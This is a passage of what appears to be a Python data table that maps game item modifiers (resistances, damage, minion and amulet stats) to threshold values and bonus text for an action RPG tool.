"+# to Armour": [(450, '(3 - 4)% increased Armour'), (1000, '(5 - 6)% increased Armour')],
"+# to Armour if you've Hit an Enemy Recently": [(800, '(3 - 4)% increased Armour'), (2000, '(5 - 6)% increased Armour')],
"+# to Dexterity": [(42, '(2 - 3) to Dexterity'), (100, '(4 - 5) to Dexterity')],
"+# to Dexterity and Intelligence": [(27, '(2 - 3) to Dexterity\n(2 - 3) to Intelligence'), (100, '(4 - 5) to Dexterity\n(4 - 5) to Intelligence')],
"+# to Evasion Rating": [(450, '(3 - 4)% increased Evasion Rating'), (1000, '(5 - 6)% increased Evasion Rating')],
"+# to Evasion Rating if Hit an Enemy Recently": [(800, '(3 - 4)% increased Evasion Rating'), (2000, '(5 - 6)% increased Evasion Rating')],
"+# to Intelligence": [(42, '(2 - 3) to Intelligence'), (100, '(4 - 5) to Intelligence')],
"+# to Strength": [(42, '(2 - 3) to Strength'), (100, '(4 - 5) to Strength')],
"+# to Strength and Dexterity": [(27, '(2 - 3) to Strength\n(2 - 3) to Dexterity'), (100, '(4 - 5) to Strength\n(4 - 5) to Dexterity')],
"+# to Strength and Intelligence": [(27, '(2 - 3) to Strength\n(2 - 3) to Intelligence'), (100, '(4 - 5) to Strength\n(4 - 5) to Intelligence')],
"+# to all Attributes": [(20, '(2 - 3) to Strength\n(2 - 3) to Dexterity\n(2 - 3) to Intelligence'), (50, '(4 - 5) to Strength\n(4 - 5) to Dexterity\n(4 - 5) to Intelligence')],
"+# to maximum Energy Shield": [(135, '(3 - 4) to maximum Energy Shield'), (500, '(5 - 6) to maximum Energy Shield')],
"+# to maximum Life": [(130, '(3 - 4) to maximum Life'), (500, '(5 - 6) to maximum Life')],
"+# to maximum Mana": [(130, '(2 - 3) to maximum Mana'), (500, '(4 - 5) to maximum Mana')],
"+#% Chance to Block Attack Damage if you were Damaged by a Hit Recently": [(4, '(6 - 7)% increased Stun and Block Recovery'), (10, '(4 - 6) Life gained when you Block')],
"+#% Chance to Block Spell Damage if you were Damaged by a Hit Recently": [(4, '(6 - 7)% increased Stun and Block Recovery'), (10, '(3 - 5) Mana gained when you Block')],
"+#% to Chaos Resistance": [(100, '(2 - 3) to Chaos Resistance')],
"+#% to Cold Resistance": [(35, '(2 - 3) to Cold Resistance'), (100, '(4 - 5) to Cold Resistance')],
"+#% to Cold and Lightning Resistances": [(34, '(2 - 3) to Cold Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Cold Resistance\n(4 - 5) to Lightning Resistance')],
"+#% to Critical Strike Multiplier if you've Killed Recently": [(36, '2 to Global Critical Strike Multiplier'), (100, '(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Fire Resistance": [(35, '(2 - 3) to Fire Resistance'), (100, '(4 - 5) to Fire Resistance')],
"+#% to Fire and Cold Resistances": [(34, '(2 - 3) to Fire Resistance\n(2 - 3) to Cold Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(34, '(2 - 3) to Fire Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(30, '2 to Global Critical Strike Multiplier'), (100, '(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(35, '(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Lightning Resistance')],
"+#% to all Elemental Resistances": [(28, '(2 - 3) to Fire Resistance\n(2 - 3) to Cold Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Cold Resistance\n(4 - 5) to Lightning Resistance')],
"Adds # to # Chaos Damage to Attacks": [(16, '(3 - 4)% increased Chaos Damage with Attack Skills'), (100, '(5 - 6)% increased Chaos Damage with Attack Skills')],
"Adds # to # Chaos Damage to Spells": [(45, '(3 - 4)% increased Chaos Damage with Spell Skills'), (100, '(5 - 6)% increased Chaos Damage with Spell Skills')],
"Adds # to # Chaos Damage to Spells while Dual Wielding": [(60, '(2 - 3)% increased Critical Strike Chance for Spells while Dual Wielding'), (200, '(4 - 5)% increased Critical Strike Chance for Spells while Dual Wielding')],
"Adds # to # Chaos Damage to Spells while holding a Shield": [(60, '(2 - 3)% increased Critical Strike Chance for Spells while holding a Shield'), (200, '(4 - 5)% increased Critical Strike Chance for Spells while holding a Shield')],
"Adds # to # Chaos Damage to Spells while wielding a Two Handed Weapon": [(60, '(2 - 3)% increased Critical Strike Chance for Spells while wielding a Staff'), (200, '(4 - 5)% increased Critical Strike Chance for Spells while wielding a Staff')],
"Adds # to # Cold Damage to Attacks": [(95, '(3 - 4)% increased Cold Damage with Attack Skills'), (200, '(5 - 6)% increased Cold Damage with Attack Skills')],
"Adds # to # Cold Damage to Axe Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Axes'), (500, '(4 - 5)% increased Accuracy Rating with Axes')],
"Adds # to # Cold Damage to Bow Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Bows'), (500, '(4 - 5)% increased Accuracy Rating with Bows')],
"Adds # to # Cold Damage to Claw Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Claws'), (500, '(4 - 5)% increased Accuracy Rating with Claws')],
"Adds # to # Cold Damage to Dagger Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Daggers'), (500, '(4 - 5)% increased Accuracy Rating with Daggers')],
"Adds # to # Cold Damage to Mace Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Maces'), (500, '(4 - 5)% increased Accuracy Rating with Maces')],
"Adds # to # Cold Damage to Spells": [(70, '(3 - 4)% increased Cold Damage with Spell Skills'), (200, '(5 - 6)% increased Cold Damage with Spell Skills')],
"Adds # to # Cold Damage to Spells while Dual Wielding": [(80, '(0.5 - 0.67) Mana Regenerated per Second while Dual Wielding'), (200, '(0.83 - 1.0) Mana Regenerated per Second while Dual Wielding')],
"Adds # to # Cold Damage to Spells while holding a Shield": [(80, '(0.5 - 0.67) Mana Regenerated per Second while holding a Shield'), (200, '(0.83 - 1.0) Mana Regenerated per Second while holding a Shield')],
"Adds # to # Cold Damage to Spells while wielding a Two Handed Weapon": [(80, '(0.5 - 0.67) Mana Regenerated per Second while wielding a Staff'), (200, '(0.83 - 1.0) Mana Regenerated per Second while wielding a Staff')],
"Adds # to # Cold Damage to Staff Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Staves'), (500, '(4 - 5)% increased Accuracy Rating with Staves')],
"Adds # to # Cold Damage to Sword Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Swords'), (500, '(4 - 5)% increased Accuracy Rating with Swords')],
"Adds # to # Cold Damage to Wand Attacks": [(102, '(2 - 3)% increased Accuracy Rating with Wands'), (500, '(4 - 5)% increased Accuracy Rating with Wands')],
"Adds # to # Fire Damage to Attacks": [(100, '(3 - 4)% increased Fire Damage with Attack Skills'), (200, '(5 - 6)% increased Fire Damage with Attack Skills')],
"Adds # to # Fire Damage to Axe Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Axes'), (500, '(4 - 5) to Critical Strike Multiplier with Axes')],
"Adds # to # Fire Damage to Bow Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Bows'), (500, '(4 - 5) to Critical Strike Multiplier with Bows')],
"Adds # to # Fire Damage to Claw Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Claws'), (500, '(4 - 5) to Critical Strike Multiplier with Claws')],
"Adds # to # Fire Damage to Dagger Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Daggers'), (500, '(4 - 5) to Critical Strike Multiplier with Daggers')],
"Adds # to # Fire Damage to Mace Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Maces'), (500, '(4 - 5) to Critical Strike Multiplier with Maces')],
"Adds # to # Fire Damage to Spells": [(70, '(3 - 4)% increased Fire Damage with Spell Skills'), (200, '(5 - 6)% increased Fire Damage with Spell Skills')],
"Adds # to # Fire Damage to Spells while Dual Wielding": [(80, '(2 - 3) to Critical Strike Multiplier for Spells while Dual Wielding'), (200, '(4 - 5) to Critical Strike Multiplier for Spells while Dual Wielding')],
"Adds # to # Fire Damage to Spells while holding a Shield": [(80, '(2 - 3) to Critical Strike Multiplier for Spells while holding a Shield'), (200, '(4 - 5) to Critical Strike Multiplier for Spells while holding a Shield')],
"Adds # to # Fire Damage to Spells while wielding a Two Handed Weapon": [(80, '(2 - 3) to Critical Strike Multiplier for Spells while wielding a Staff'), (200, '(4 - 5) to Critical Strike Multiplier for Spells while wielding a Staff')],
"Adds # to # Fire Damage to Staff Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Staves'), (500, '(4 - 5) to Critical Strike Multiplier with Staves')],
"Adds # to # Fire Damage to Sword Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Swords'), (500, '(4 - 5) to Critical Strike Multiplier with Swords')],
"Adds # to # Fire Damage to Wand Attacks": [(114, '(2 - 3) to Critical Strike Multiplier with Wands'), (500, '(4 - 5) to Critical Strike Multiplier with Wands')],
"Adds # to # Lightning Damage to Attacks": [(160, '(3 - 4)% increased Lightning Damage with Attack Skills'), (300, '(5 - 6)% increased Lightning Damage with Attack Skills')],
"Adds # to # Lightning Damage to Axe Attacks": [(183, '(1 - 2)% increased Attack Speed with Axes'), (500, '3% increased Attack Speed with Axes')],
"Adds # to # Lightning Damage to Bow Attacks": [(183, '(1 - 2)% increased Attack Speed with Bows'), (500, '3% increased Attack Speed with Bows')],
"Adds # to # Lightning Damage to Claw Attacks": [(183, '(1 - 2)% increased Attack Speed with Claws'), (500, '3% increased Attack Speed with Claws')],
"Adds # to # Lightning Damage to Dagger Attacks": [(183, '(1 - 2)% increased Attack Speed with Daggers'), (500, '3% increased Attack Speed with Daggers')],
"Adds # to # Lightning Damage to Mace Attacks": [(183, '(1 - 2)% increased Attack Speed with Maces'), (500, '3% increased Attack Speed with Maces')],
"Adds # to # Lightning Damage to Spells": [(100, '(3 - 4)% increased Lightning Damage with Spell Skills'), (300, '(5 - 6)% increased Lightning Damage with Spell Skills')],
"Adds # to # Lightning Damage to Spells while Dual Wielding": [(130, '(1 - 2)% increased Cast Speed while Dual Wielding'), (200, '3% increased Cast Speed while Dual Wielding')],
"Adds # to # Lightning Damage to Spells while holding a Shield": [(130, '(1 - 2)% increased Cast Speed while holding a Shield'), (200, '3% increased Cast Speed while holding a Shield')],
"Adds # to # Lightning Damage to Spells while wielding a Two Handed Weapon": [(130, '(1 - 2)% increased Cast Speed while wielding a Staff'), (200, '3% increased Cast Speed while wielding a Staff')],
"Adds # to # Lightning Damage to Staff Attacks": [(183, '(1 - 2)% increased Attack Speed with Staves'), (500, '3% increased Attack Speed with Staves')],
"Adds # to # Lightning Damage to Sword Attacks": [(183, '(1 - 2)% increased Attack Speed with Swords'), (500, '3% increased Attack Speed with Swords')],
"Adds # to # Lightning Damage to Wand Attacks": [(183, '(1 - 2)% increased Attack Speed with Wands'), (500, '3% increased Attack Speed with Wands')],
"Adds # to # Physical Damage to Attacks": [(16, '(3 - 4)% increased Physical Damage with Attack Skills'), (100, '(5 - 6)% increased Physical Damage with Attack Skills')],
"Adds # to # Physical Damage to Axe Attacks": [(27, '(3 - 4)% increased Physical Damage with Axes'), (100, '(5 - 6)% increased Physical Damage with Axes')],
"Adds # to # Physical Damage to Bow Attacks": [(27, '(3 - 4)% increased Physical Damage with Bows'), (100, '(5 - 6)% increased Physical Damage with Bows')],
"Adds # to # Physical Damage to Claw Attacks": [(27, '(3 - 4)% increased Physical Damage with Claws'), (100, '(5 - 6)% increased Physical Damage with Claws')],
"Adds # to # Physical Damage to Dagger Attacks": [(27, '(3 - 4)% increased Physical Damage with Daggers'), (100, '(3 - 4)% increased Physical Damage with Daggers')],
"Adds # to # Physical Damage to Mace Attacks": [(27, '(3 - 4)% increased Physical Damage with Maces'), (100, '(5 - 6)% increased Physical Damage with Maces')],
"Adds # to # Physical Damage to Spells": [(45, '(3 - 4)% increased Physical Damage with Spell Skills'), (100, '(5 - 6)% increased Physical Damage with Spell Skills')],
"Adds # to # Physical Damage to Spells while Dual Wielding": [(60, '(3 - 4)% increased Spell Damage while Dual Wielding'), (200, '(5 - 6)% increased Spell Damage while Dual Wielding')],
"Adds # to # Physical Damage to Spells while holding a Shield": [(60, '(3 - 4)% increased Spell Damage while holding a Shield'), (200, '(5 - 6)% increased Spell Damage while holding a Shield')],
"Adds # to # Physical Damage to Spells while wielding a Two Handed Weapon": [(60, '(3 - 4)% increased Spell Damage while wielding a Staff'), (200, '(5 - 6)% increased Spell Damage while wielding a Staff')],
"Adds # to # Physical Damage to Staff Attacks": [(27, '(3 - 4)% increased Physical Damage with Staves'), (100, '(5 - 6)% increased Physical Damage with Staves')],
"Adds # to # Physical Damage to Sword Attacks": [(27, '(3 - 4)% increased Physical Damage with Swords'), (100, '(5 - 6)% increased Physical Damage with Swords')],
"Adds # to # Physical Damage to Wand Attacks": [(27, '(3 - 4)% increased Physical Damage with Wands'), (100, '(5 - 6)% increased Physical Damage with Wands')],
"Damage Penetrates #% Cold Resistance": [(2, '(2 - 3)% increased Cold Damage'), (5, '(4 - 5)% increased Cold Damage')],
"Damage Penetrates #% Elemental Resistance if you haven't Killed Recently": [(4, '(2 - 3)% increased Elemental Damage'), (10, '(4 - 5)% increased Elemental Damage')],
"Damage Penetrates #% Elemental Resistances": [(2, '(2 - 3)% increased Elemental Damage'), (5, '(4 - 5)% increased Elemental Damage')],
"Damage Penetrates #% Fire Resistance": [(2, '(2 - 3)% increased Fire Damage'), (5, '(4 - 5)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(2, '(2 - 3)% increased Lightning Damage'), (5, '(4 - 5)% increased Lightning Damage')],
"Gain #% of Physical Damage as Extra Fire Damage if you've dealt a Critical Strike Recently": [(10, '(2 - 3)% increased Fire Damage'), (50, '(4 - 5)% increased Fire Damage\n3% of Physical Damage Converted to Fire Damage')],
"Minions Leech #% of Damage as Life": [(1.2, 'Minions deal (2 - 3)% increased Damage'), (5.0, 'Minions deal (4 - 5)% increased Damage')],
"Minions Regenerate # Life per second": [(30, 'Minions have (2 - 3)% increased maximum Life'), (100, 'Minions have (4 - 5)% increased maximum Life')],
"Minions Regenerate #% Life per second": [(2.0, 'Minions have (2 - 3)% increased maximum Life'), (8.33, 'Minions have (4 - 5)% increased maximum Life')],
"Minions deal # to # additional Chaos Damage": [(55, 'Minions have 3 to all Elemental Resistances'), (100, 'Minions have (4 - 5) to all Elemental Resistances')],
"Minions deal # to # additional Cold Damage": [(55, 'Minions have (2 - 3)% increased maximum Life'), (100, 'Minions have (4 - 5)% increased maximum Life')],
"Minions deal # to # additional Fire Damage": [(55, 'Minions deal (2 - 3)% increased Damage'), (100, 'Minions deal (4 - 5)% increased Damage')],
"Minions deal # to # additional Lightning Damage": [(85, '2% increased Minion Accuracy Rating'), (150, '(3 - 4)% increased Minion Accuracy Rating')],
"Minions deal # to # additional Physical Damage": [(55, 'Minions have (1 - 2)% increased Movement Speed'), (100, 'Minions have 3% increased Movement Speed')],
"Minions deal #% increased Damage against Abyssal Monsters": [(100, 'Minions deal (2 - 3)% increased Damage'), (200, 'Minions deal (4 - 5)% increased Damage')],
"Minions have #% chance to Blind on Hit with Attacks": [(15, '2% increased Minion Accuracy Rating'), (50, '(3 - 4)% increased Minion Accuracy Rating')],
"Minions have #% chance to Hinder Enemies on Hit with Spells, with 30% reduced Movement Speed": [(20, 'Minions have 3 to all Elemental Resistances'), (50, 'Minions have (4 - 5) to all Elemental Resistances')],
"Minions have #% chance to Taunt on Hit with Attacks": [(20, '2% increased Minion Accuracy Rating'), (50, '(3 - 4)% increased Minion Accuracy Rating')],
"Minions have #% increased Attack Speed": [(15, 'Minions have (1 - 2)% increased Attack Speed'), (50, 'Minions have 3% increased Attack Speed')],
"Minions have #% increased Attack and Cast Speed if you or your Minions have Killed Recently": [(21, 'Minions have (1 - 2)% increased Attack Speed\nMinions have (1 - 2)% increased Cast Speed'), (50, 'Minions have 3% increased Attack Speed\nMinions have 3% increased Cast Speed')],
"Minions have #% increased Cast Speed": [(15, 'Minions have (1 - 2)% increased Cast Speed'), (50, 'Minions have 3% increased Cast Speed')],
"Minions have #% increased Movement Speed": [(24, 'Minions have (1 - 2)% increased Movement Speed'), (100, 'Minions have 3% increased Movement Speed')],
"Minions have #% increased maximum Life": [(30, 'Minions have (2 - 3)% increased maximum Life'), (100, 'Minions have (4 - 5)% increased maximum Life')],
"Minions have +#% to Chaos Resistance": [(27, 'Minions have 3 to all Elemental Resistances'), (100, 'Minions have (4 - 5) to all Elemental Resistances')],
"Minions have +#% to all Elemental Resistances": [(25, 'Minions have 3 to all Elemental Resistances'), (100, 'Minions have (4 - 5) to all Elemental Resistances')],
},
"Amulet": {
"# Life Regenerated per second": [(25.0, '(0.6 - 0.7)% of Life Regenerated per second'), (41.67, '(0.8 - 0.93)% of Life Regenerated per second'), (58.33, '1.0% of Life Regenerated per second'), (83.33, '1.0% of Life Regenerated per second\n(80.0 - 100.0) Life Regenerated per second')],
"#% Chance to Trigger Level 18 Summon Spectral Wolf on Kill": [(11, 'Minions deal (11 - 12)% increased Damage'), (22, 'Minions deal (13 - 14)% increased Damage'), (50, 'Minions deal (15 - 16)% increased Damage')],
"#% chance to Recover 10% of Maximum Mana when you use a Skill": [(11, '(2.0 - 2.5) Mana Regenerated per second'), (22, '(2.52 - 3.0) Mana Regenerated per second'), (50, '(3.02 - 4.0) Mana Regenerated per second\n0.5% of Mana Regenerated per second')],
"#% chance when Hit for double Armour effect": [(25, '(7 - 9)% increased Armour'), (50, '(10 - 12)% increased Armour'), (100, '(13 - 15)% increased Armour\nDetermination has (15 - 20)% increased Aura Effect')],
"#% increased Area Damage": [(20, '(10 - 12)% increased Area Damage'), (40, '(13 - 15)% increased Area Damage'), (100, '(9 - 10)% increased Area of Effect')],
"#% increased Armour": [(20, '(7 - 9)% increased Armour'), (40, '(10 - 12)% increased Armour'), (55, '(13 - 15)% increased Armour'), (100, '(13 - 15)% increased Armour\n(1 - 2) to maximum Chance to Block Attack Damage\n(1 - 2) to maximum Chance to Block Spell Damage')],
"#% increased Attack and Cast Speed": [(15, '4% increased Attack and Cast Speed'), (50, '5% increased Attack and Cast Speed')],
"#% increased Brand Attachment range": [(30, '(2 - 3)% increased Brand Attachment range'), (100, '(4 - 5)% increased Brand Attachment range')],
"#% increased Cast Speed": [(20, '3% increased Cast Speed'), (35, '4% increased Cast Speed'), (100, '5% increased Cast Speed')],
"#% increased Chaos Damage": [(20, '8% increased Chaos Damage'), (40, '(9 - 10)% increased Chaos Damage'), (60, '(11 - 12)% increased Chaos Damage'), (80, '(13 - 14)% increased Chaos Damage'), (200, '(15 - 16)% increased Chaos Damage')],
"#% increased Cold Damage": [(20, '8% increased Cold Damage'), (40, '(9 - 10)% increased Cold Damage'), (60, '(11 - 12)% increased Cold Damage'), (80, '(13 - 14)% increased Cold Damage'), (200, '(15 - 16)% increased Cold Damage\nDamage Penetrates (3 - 5)% Cold Resistance')],
"#% increased Damage while Leeching": [(100, '(10 - 12)% increased Damage while Leeching'), (200, '(13 - 15)% increased Damage while Leeching')],
"#% increased Damage with Ailments": [(30, '8% increased Damage with Ailments'), (60, '(9 - 10)% increased Damage with Ailments'), (90, '(11 - 12)% increased Damage with Ailments'), (105, '(13 - 14)% increased Damage with Ailments'), (200, '(15 - 16)% increased Damage with Ailments')],
"#% increased Effect of Fortify on you": [(20, '250 to Armour and Evasion Rating while you have Fortify'), (40, '500 to Armour and Evasion Rating while you have Fortify'), (100, '800 to Armour and Evasion Rating while you have Fortify')],
"#% increased Elemental Damage with Attack Skills": [(40, '(12 - 13)% increased Elemental Damage with Attack Skills'), (80, '(14 - 15)% increased Elemental Damage with Attack Skills'), (115, '(16 - 18)% increased Elemental Damage with Attack Skills'), (130, '(19 - 21)% increased Elemental Damage with Attack Skills'), (200, '(22 - 24)% increased Elemental Damage with Attack Skills\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Energy Shield from Body Armour": [(20, '(8 - 9)% increased Energy Shield Recharge Rate'), (40, '(10 - 11)% increased Energy Shield Recharge Rate'), (100, '(12 - 15)% increased Energy Shield Recharge Rate\nDiscipline has (15 - 20)% increased Aura Effect')],
"#% increased Evasion Rating": [(20, '(7 - 9)% increased Evasion Rating'), (40, '(10 - 12)% increased Evasion Rating'), (55, '(13 - 15)% increased Evasion Rating'), (100, '(13 - 15)% increased Evasion Rating\n(1 - 2) to maximum Chance to Dodge Attack Hits\n(1 - 2) to maximum Chance to Dodge Spell Hits')],
"#% increased Fire Damage": [(20, '8% increased Fire Damage'), (40, '(9 - 10)% increased Fire Damage'), (60, '(11 - 12)% increased Fire Damage'), (80, '(13 - 14)% increased Fire Damage'), (200, '(15 - 16)% increased Fire Damage\nDamage Penetrates (3 - 5)% Fire Resistance')],
"#% increased Global Critical Strike Chance": [(40, '(14 - 15)% increased Global Critical Strike Chance'), (70, '(16 - 17)% increased Global Critical Strike Chance'), (90, '(18 - 20)% increased Global Critical Strike Chance'), (105, '(21 - 23)% increased Global Critical Strike Chance'), (300, '(24 - 26)% increased Global Critical Strike Chance')],
"#% increased Global Physical Damage": [(20, '8% increased Global Physical Damage'), (40, '(9 - 10)% increased Global Physical Damage'), (60, '(11 - 12)% increased Global Physical Damage'), (80, '(13 - 14)% increased Global Physical Damage'), (200, '(15 - 16)% increased Global Physical Damage')],
"#% increased Life Recovery from Flasks": [(40, '4% increased maximum Life'), (80, '(5 - 6)% increased maximum Life'), (200, '(7 - 8)% increased maximum Life\n(80.0 - 100.0) Life Regenerated per second')],
"#% increased Lightning Damage": [(20, '8% increased Lightning Damage'), (40, '(9 - 10)% increased Lightning Damage'), (60, '(11 - 12)% increased Lightning Damage'), (80, '(13 - 14)% increased Lightning Damage'), (200, '(15 - 16)% increased Lightning Damage\nDamage Penetrates (3 - 5)% Lightning Resistance')],
"#% increased Mana Recovery rate": [(15, '(22 - 24)% increased Mana Regeneration Rate'), (30, '(25 - 27)% increased Mana Regeneration Rate'), (100, '(28 - 30)% increased Mana Regeneration Rate\n0.5% of Mana Regenerated per second')],
"#% increased Mana Regeneration Rate": [(75, '(2.0 - 2.5) Mana Regenerated per second'), (150, '(2.52 - 3.0) Mana Regenerated per second'), (190, '(3.02 - 4.0) Mana Regenerated per second'), (500, '(3.02 - 4.0) Mana Regenerated per second\n0.5% of Mana Regenerated per second')],
"#% increased Melee Damage": [(20, '(10 - 12)% increased Melee Damage'), (40, '(13 - 15)% increased Melee Damage'), (100, '1 to Melee Weapon and Unarmed Attack range')],
"#% increased Mine Laying Speed": [(30, '(2 - 3)% increased Mine Laying Speed'), (100, '(4 - 5)% increased Mine Laying Speed')],
"#% increased Projectile Damage": [(20, '(10 - 12)% increased Projectile Damage'), (40, '(13 - 15)% increased Projectile Damage'), (100, '(18 - 20)% increased Projectile Speed')],
"#% increased Rarity of Items found": [(30, '(10 - 11)% increased Rarity of Items found'), (60, '(12 - 13)% increased Rarity of Items found'), (90, '(14 - 15)% increased Rarity of Items found'), (120, '(16 - 17)% increased Rarity of Items found'), (145, '(18 - 20)% increased Rarity of Items found'), (200, '(4 - 5)% increased Movement Speed')],
"#% increased Spell Damage": [(50, '(19 - 22)% increased Spell Damage'), (70, '(23 - 26)% increased Spell Damage'), (150, '(27 - 30)% increased Spell Damage')],
"#% increased Totem Placement speed": [(75, '(2 - 3)% increased Totem Placement speed'), (150, '(4 - 5)% increased Totem Placement speed')],
"#% increased Trap Throwing Speed": [(30, '(2 - 3)% increased Trap Throwing Speed'), (100, '(4 - 5)% increased Trap Throwing Speed')],
"#% increased Vaal Skill Effect Duration": [(35, '(5 - 8)% increased Vaal Skill Effect Duration'), (70, '(9 - 12)% increased Vaal Skill Effect Duration'), (200, '(6 - 8)% increased maximum Life if Corrupted\n(8 - 10)% increased maximum Energy Shield if Corrupted')],
"#% increased maximum Energy Shield": [(20, '(8 - 9)% increased Energy Shield Recharge Rate'), (40, '(10 - 11)% increased Energy Shield Recharge Rate'), (55, '(12 - 15)% increased Energy Shield Recharge Rate'), (100, '(12 - 15)% increased Energy Shield Recharge Rate\n(5 - 3)% reduced Mana Reserved')],
"#% increased total Recovery per second from Life Leech": [(50, '(8 - 10)% increased total Recovery per second from Life Leech'), (100, '(11 - 13)% increased total Recovery per second from Life Leech'), (200, '(14 - 16)% increased total Recovery per second from Life Leech\n10% increased Maximum total Recovery per second from Life Leech')],
"#% of Chaos Damage Leeched as Life": [(0.6, '(11 - 12)% increased Chaos Damage'), (1.2, '(13 - 14)% increased Chaos Damage'), (2.0, '(15 - 16)% increased Chaos Damage\n0.5% of Chaos Damage Leeched as Life')],
"#% of Damage taken gained as Mana over 4 seconds when Hit": [(8, '(2.0 - 2.5) Mana Regenerated per second'), (16, '(2.52 - 3.0) Mana Regenerated per second'), (50, '(3.02 - 4.0) Mana Regenerated per second')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '0.4% of Physical Attack Damage Leeched as Life\n10% increased Maximum total Recovery per second from Life Leech')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.3% of Physical Attack Damage Leeched as Mana\n10% increased Maximum total Recovery per second from Mana Leech')],
"#% reduced Mana Cost of Skills": [(10, '2% reduced Mana Cost of Skills'), (20, '3% reduced Mana Cost of Skills'), (50, '(4 - 5)% reduced Mana Cost of Skills')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(9 - 15) Life gained for each Enemy hit by your Attacks')],
"+# Life gained on Kill": [(15, '(6 - 8) Life gained on Kill'), (25, '(9 - 11) Life gained on Kill'), (35, '(12 - 15) Life gained on Kill'), (100, '(12 - 15) Life gained on Kill\nRecover (1 - 2)% of Maximum Life on Kill')],
"+# Mana gained on Kill": [(5, '3 Mana gained on Kill'), (10, '4 Mana gained on Kill'), (15, '5 Mana gained on Kill'), (50, '5 Mana gained on Kill\nRecover (1 - 2)% of Maximum Mana on Kill')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (1400, '(18 - 20)% increased Global Accuracy Rating'), (2000, '(18 - 20)% increased Global Accuracy Rating\n(150 - 250) to Accuracy Rating')],
"+# to Dexterity": [(100, '(7 - 9)% increased Dexterity'), (130, '(10 - 12)% increased Dexterity'), (160, '(13 - 15)% increased Dexterity'), (200, '(13 - 15)% increased Dexterity\n1% increased Damage per 15 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Intelligence": [(100, '(7 - 9)% increased Intelligence'), (130, '(10 - 12)% increased Intelligence'), (160, '(13 - 15)% increased Intelligence'), (200, '(13 - 15)% increased Intelligence\n1% increased Damage per 15 Intelligence')],
"+# to Minimum Endurance Charges": [(1, '(8 - 11)% increased Endurance Charge Duration'), (2, '(12 - 15)% increased Endurance Charge Duration'), (5, '(3 - 4)% increased Damage per Endurance Charge')],
"+# to Minimum Frenzy Charges": [(1, '(8 - 11)% increased Frenzy Charge Duration'), (2, '(12 - 15)% increased Frenzy Charge Duration'), (5, '(3 - 4)% increased Damage per Frenzy Charge')],
"+# to Minimum Power Charges": [(1, '(8 - 11)% increased Power Charge Duration'), (2, '(12 - 15)% increased Power Charge Duration'), (5, '(3 - 4)% increased Damage per Power Charge')],
"+# to Strength": [(100, '(7 - 9)% increased Strength'), (130, '(10 - 12)% increased Strength'), (160, '(13 - 15)% increased Strength'), (200, '(13 - 15)% increased Strength\n1% increased Damage per 15 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Total Mana Cost of Skills": [(12, '-1 to Total Mana Cost of Skills'), (24, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"+# to all Attributes": [(30, '4% increased Strength\n4% increased Dexterity\n4% increased Intelligence'), (60, '5% increased Strength\n5% increased Dexterity\n5% increased Intelligence'), (95, '6% increased Strength\n6% increased Dexterity\n6% increased Intelligence'), (200, '6% increased Strength\n6% increased Dexterity\n6% increased Intelligence\n(4 - 5)% increased Damage per Endurance Charge\n(4 - 5)% increased Damage per Frenzy Charge\n(4 - 5)% increased Damage per Power Charge')],
